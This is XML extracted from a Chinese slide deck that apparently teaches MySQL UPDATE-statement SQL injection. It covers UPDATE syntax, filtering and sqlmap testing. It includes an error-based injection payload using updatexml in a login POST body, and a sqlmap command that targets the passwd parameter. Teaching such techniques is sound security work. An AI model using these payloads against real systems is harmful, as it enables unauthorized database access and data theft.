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4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mtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>POST update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语句注入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安全测试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2176145"/>
            <a:ext cx="11116945" cy="39947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5655" y="1530985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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的内容并指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入漏洞的利用。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sqlmap -r target.txt -p passwd</a:t>
            </a:r>
            <a:endParaRPr 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934085" y="2914650"/>
            <a:ext cx="4359275" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="4359275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344987" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="4344987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3775075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Mysql update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7432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过滤内容介绍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662103" y="2914333"/>
            <a:ext cx="4359275" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="435927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77507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Mysql update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注入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3788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安全测试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663633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16117" y="1202601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934085" y="2914650"/>
            <a:ext cx="4359275" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="4359275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344987" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="4344987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3775075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Mysql update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7432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过滤内容介绍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662103" y="2914333"/>
            <a:ext cx="4359275" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="435927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77507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Mysql update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注入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3788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安全测试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663633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852545" y="3081655"/>
            <a:ext cx="448754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Mysql update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5655" y="1706880"/>
            <a:ext cx="106006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update 语句可用来修改表中的数据, 简单来说基本的使用形式为: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update 表名称 set 列名称=新值 where 更新条件;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UPDATE table_name SET field1=new-value1, field2=new-value2 [WHERE Clause]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617220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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更新数据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152140" y="3163570"/>
            <a:ext cx="563181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过滤内容介绍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7055" y="1238885"/>
            <a:ext cx="5910580" cy="52393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5655" y="617220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过滤内容介绍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818765" y="3163570"/>
            <a:ext cx="645477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Mysql update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502920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Mysql  update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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4845" y="2018665"/>
            <a:ext cx="8322945" cy="44253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5655" y="153098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uname=admin&amp;passwd=admin' or updatexml(1,concat(0x7e,version(),0x7e),1) #&amp;submit=Submit</a:t>
            </a:r>
            <a:endParaRPr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40735" y="3081655"/>
            <a:ext cx="587756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安全测试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WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>63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Mysql update介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>过滤内容介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Mysql update注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Sqlmap安全测试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120</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-11T12:34:18Z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